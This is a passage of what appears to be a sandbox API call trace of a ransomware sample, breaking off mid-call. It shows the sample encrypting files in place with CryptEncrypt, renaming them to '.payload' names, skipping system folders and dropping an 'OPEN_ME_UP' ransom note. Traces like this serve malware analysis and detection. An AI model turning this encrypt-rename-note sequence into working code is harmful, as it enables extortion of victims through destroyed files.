lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.821] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.821] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.821] CloseHandle (hObject=0x438) returned 1 [0058.823] GetProcessHeap () returned 0x5e0000 [0058.824] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.824] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.824] GetProcessHeap () returned 0x5e0000 [0058.824] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.824] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.824] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.824] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.824] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.824] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.824] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.824] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 49 [0058.824] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.824] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.824] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.824] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.824] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.825] GetTickCount () returned 0x114f250 [0058.825] GetTickCount () returned 0x114f250 [0058.825] GetTickCount () returned 0x114f250 [0058.825] GetTickCount () returned 0x114f250 [0058.825] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.825] GetProcessHeap () returned 0x5e0000 [0058.825] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.825] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.827] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.827] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.827] GetProcessHeap () returned 0x5e0000 [0058.827] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.827] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.827] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.828] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.828] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.828] CloseHandle (hObject=0x438) returned 1 [0058.829] GetProcessHeap () returned 0x5e0000 [0058.829] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.829] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.829] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.829] GetProcessHeap () returned 0x5e0000 [0058.829] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.829] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.829] FindClose (in: hFindFile=0x6065a0 | out: hFindFile=0x6065a0) returned 1 [0058.830] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.830] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1036\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.830] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.831] CloseHandle (hObject=0x430) returned 1 [0058.831] GetProcessHeap () returned 0x5e0000 [0058.831] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.831] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1037", cAlternateFileName="")) returned 1 [0058.831] lstrcmpiW (lpString1="1037", lpString2="Windows") returned -1 [0058.831] lstrcmpiW (lpString1="1037", lpString2="$Recycle.bin") returned 1 [0058.831] lstrcmpiW (lpString1="1037", lpString2="System Volume Information") returned -1 [0058.831] lstrcmpiW (lpString1="1037", lpString2="Program Files") returned -1 [0058.831] lstrcmpiW (lpString1="1037", lpString2="Program Files (x86)") returned -1 [0058.831] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037") returned 30 [0058.831] lstrcmpW (lpString1="1037", lpString2=".") returned 1 [0058.831] lstrcmpW (lpString1="1037", lpString2="..") returned 1 [0058.831] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.831] GetProcessHeap () returned 0x5e0000 [0058.831] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.831] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\*") returned 32 [0058.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606120 [0058.832] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.832] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.832] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.832] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.832] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.832] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\.") returned 32 [0058.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.832] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.832] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.832] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.832] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.832] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.832] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\..") returned 33 [0058.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.832] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.832] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.832] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.832] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.832] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.832] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.832] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 39 [0058.832] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.832] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.832] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.832] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.832] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.833] GetTickCount () returned 0x114f250 [0058.833] GetTickCount () returned 0x114f250 [0058.833] GetTickCount () returned 0x114f250 [0058.833] GetTickCount () returned 0x114f250 [0058.833] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.833] GetProcessHeap () returned 0x5e0000 [0058.833] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.833] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x1ac3, lpOverlapped=0x0) returned 1 [0058.834] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffe53d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.834] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x1ac3, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x1ac3, lpOverlapped=0x0) returned 1 [0058.835] GetProcessHeap () returned 0x5e0000 [0058.835] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.835] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.835] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.835] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.835] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.835] CloseHandle (hObject=0x438) returned 1 [0058.836] GetProcessHeap () returned 0x5e0000 [0058.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.836] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.838] GetProcessHeap () returned 0x5e0000 [0058.838] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.838] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.838] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.838] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.838] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.838] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.838] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.838] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 48 [0058.838] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.838] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.838] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.838] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.838] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.839] GetTickCount () returned 0x114f260 [0058.839] GetTickCount () returned 0x114f260 [0058.839] GetTickCount () returned 0x114f260 [0058.839] GetTickCount () returned 0x114f260 [0058.839] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.839] GetProcessHeap () returned 0x5e0000 [0058.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.839] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.841] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.841] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.841] GetProcessHeap () returned 0x5e0000 [0058.841] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.841] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.841] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.842] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.842] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.842] CloseHandle (hObject=0x438) returned 1 [0058.844] GetProcessHeap () returned 0x5e0000 [0058.844] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.844] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.844] GetProcessHeap () returned 0x5e0000 [0058.844] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.844] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.844] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.844] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.844] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.845] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.845] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.845] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 49 [0058.845] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.845] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.845] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.845] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.845] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.845] GetTickCount () returned 0x114f260 [0058.845] GetTickCount () returned 0x114f260 [0058.845] GetTickCount () returned 0x114f260 [0058.845] GetTickCount () returned 0x114f260 [0058.846] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.846] GetProcessHeap () returned 0x5e0000 [0058.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.846] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.847] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.848] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.848] GetProcessHeap () returned 0x5e0000 [0058.848] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.848] SetFilePointerEx (in: hFile=0x438, 